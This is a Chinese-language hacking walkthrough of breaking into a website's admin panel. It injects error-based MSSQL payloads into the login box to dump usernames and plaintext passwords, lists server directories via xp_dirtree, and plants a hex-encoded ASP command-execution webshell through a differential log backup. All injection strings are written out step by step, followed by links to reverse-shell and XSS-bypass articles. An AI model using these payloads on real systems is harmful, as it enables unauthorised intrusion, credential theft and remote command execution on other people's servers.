后臺(tái)登入框注入拿shell步驟


看來(lái)有點(diǎn)防范啊,為了確定是否是防注入系統(tǒng),如果是的話,我們就可以試試cookie注入了,于是,我換個(gè)方法檢測(cè)了下,就是
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65&MainBcgID=102-0
在數(shù)字后加上減0,回車(chē),彈出相同的提示對(duì)話框,分別提交
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65-0&MainBcgID=102
http://www.xxx.com/kssz.asp?BcgID=104-0&ThatBcgID=65&MainBcgID=102
都是相同的提示,看來(lái)是程序過(guò)濾了,非防注入。
然后我就打開(kāi)Google,搜索了下帶有asp?id=的鏈接,結(jié)果都是一樣,那注入就沒(méi)戲了。
接下來(lái),俺就拿出自己寫(xiě)的掃描工具掃描了下常見(jiàn)上傳點(diǎn),也沒(méi)有發(fā)現(xiàn),看來(lái),只能向后臺(tái)輸入框進(jìn)軍了哈。
在后臺(tái)輸入一個(gè)單引號(hào),隨便輸入密碼,回車(chē),報(bào)錯(cuò)了,哈
看來(lái)朋友說(shuō)的沒(méi)錯(cuò),有戲啊,而且是mssql的,幸虧是mssql的,不然還拿不下呢(原因,后面會(huì)提到)
接著,按照常規(guī)步驟,開(kāi)始注入了,但是俺是懶人,想偷點(diǎn)懶,于是抓包,想通過(guò)get方式來(lái)注入,這樣可以讓工具來(lái)代替人力啊,哈哈,
于是,組合下內(nèi)容
www.xxx.com/login/default.asp?Submit=%B5%C7+%C2%BC&Userpwd=1& Username=1
可是老天就是不配合俺,這個(gè)方法在這里不行啊。哎,看來(lái)只能手工了,這個(gè)對(duì)俺來(lái)說(shuō)相當(dāng)痛苦了。
米辦法,老實(shí)的一步一步來(lái)了。在輸入框里輸入’ having 1=1 and ‘’=’ 回車(chē),報(bào)錯(cuò)
嘻嘻,我得意的笑,這里,我們得到了表名和字段名,繼續(xù)爆,輸入’group by user_info.user_id having 1=1 and ‘’=’
爆出了user_name,繼續(xù)爆,’group by user_info.user_id ,user_info.user_name having 1=1 and ‘’=’
到這里就差不多了,我們要的關(guān)鍵字段都有了,表名也有了,該是爆內(nèi)容了,輸入
’and 1=(select user_name from user_info) and ‘’=’ 爆出了用戶名
然后用相同方法,輸入’and 1=(select user_pwd from user_info) and ‘’=’ 爆出了密碼,哈哈發(fā)現(xiàn)密碼還是不加密的,那就更好了。
直接拿起密碼進(jìn)入后臺(tái)
以為接下來(lái)就容易拿到shell了,隨便找了一個(gè)上傳點(diǎn),試了下直接傳,提示成功,哈哈,開(kāi)心了,心道,今天rp不錯(cuò)的嘛,剛剛在手工那里費(fèi)了點(diǎn)時(shí)間,現(xiàn)在剛剛補(bǔ)回來(lái)了,直接拿到shell了,于是拿著地址去打開(kāi),結(jié)果,當(dāng)場(chǎng)吐血,為啥,因?yàn)樯蟼髀窂降奈募A不讓執(zhí)行腳本啊
心里大罵這個(gè)管理員,shit,shit,shit他JJ,讓老子白高興一場(chǎng)。找了下其他圖片的文件夾路徑,都是一樣,不讓執(zhí)行腳本。哎,蒼天那,大地啊,你怎么可以這樣對(duì)我啊。以為沒(méi)辦法那shell了,準(zhǔn)備放棄了,和朋友一說(shuō),他說(shuō),是不是可以在后臺(tái)進(jìn)行差異備份拿shell呢,我一聽(tīng),一拍大腿,對(duì)啊,MMB,我怎么沒(méi)想到,哎,居然把后臺(tái)的注入點(diǎn)是mssql這茬給忘了,鄙視下自己。
要差異備份首先要知道站點(diǎn),哎,俺最頭痛的手工又要開(kāi)始了,話說(shuō)到這里,插一句話,希望各位一定要好好學(xué)習(xí)sql哦,工具是死的,人是活的,手工厲害啊,雖然麻煩(觀眾:又開(kāi)始裝逼了,小心出門(mén)被雷劈啊…..我:哈哈,俺不怕,俺是絕緣體,沒(méi)事沒(méi)事…..忽然,天空一陣巨響,小影子被雷劈了。。。55555555,今天沒(méi)看黃歷啊)
開(kāi)始猜路徑了,過(guò)程是:建立一個(gè)表,通過(guò)xp_dirtree組件,把列出來(lái)的內(nèi)容插入臨時(shí)表,然后我們?cè)谝粋€(gè)一個(gè)把內(nèi)容從臨時(shí)表里讀出來(lái)。
首先,我們建立一個(gè)表,輸入’ create talbe tmp(id int identity(1,1),path varchar(255),depth int,isfile int ) and ‘’=’
然后,我們要確認(rèn)下我們的表是否建立成功了,不然如果不成功的話,我們后面做的都是無(wú)用功了,哈。輸入’ select * from tmp having 1=1 and ‘’=’,報(bào)錯(cuò)了,說(shuō)明建表成功
接下來(lái),就是插入內(nèi)容了
‘insert into tmp exec master.dbo.xp_dirtree ‘d:\’,1,1 and ‘’=’
接著,就可以列目錄了,輸入
‘ and 1=(select path from tmp where id=N) and ‘’=’ (N=1,2,3,4,5,……)
就列出了路徑
改變N的值就可以列出了,重復(fù)過(guò)程就不寫(xiě)了,最后知道路徑是D:\website\xxx.com\
接下來(lái)就是進(jìn)行差異備份了,在輸入框輸入一次輸入差異備份語(yǔ)句
'alter database hz3yy set RECOVERY FULL--
'Drop table [banlg];create table [dbo].[banlg] ([cmd] [image])--
'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737335393536 backup log @a to disk=@s with init--
'insert into banlg(cmd) values(0x3C256578656375746528726571756573742822636D64222929253E)--
'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C776562736974655C687A3379792E636F6D5C772E617370 backup log @a to disk=@s--
'Drop table [banlg]—
然后輸入網(wǎng)址,輸入http://www.xxx.com/ww.asp,熟悉的亂碼界面出現(xiàn)了,哈哈,然后就是傳shell了,圖就不截了,嘻嘻。
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來(lái)介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對(duì)控制器沒(méi)有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19
ASP+PHP 標(biāo)準(zhǔn)sql注入語(yǔ)句(完整版)
這里為大家分享一下sql注入的一些語(yǔ)句,很多情況下由于程序員的安全意識(shí)薄弱或基本功不足就容易導(dǎo)致sql注入安全問(wèn)題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對(duì)于目前流行的sql注入,程序員在編寫(xiě)程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會(huì)自動(dòng)的記錄下你的IP地址,提交的非法參數(shù)和動(dòng)作等,2017-04-29
XSS繞過(guò)技術(shù) XSS插入繞過(guò)一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個(gè)小彈窗,其中我們總結(jié)了一些平時(shí)可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲(chǔ)、DOM這三類2016-12-27Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺
這篇文章主要介紹了Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08使用爬蟲(chóng)采集網(wǎng)站時(shí),解決被封IP的幾種方法
這篇文章主要介紹了使用爬蟲(chóng)采集網(wǎng)站時(shí),解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08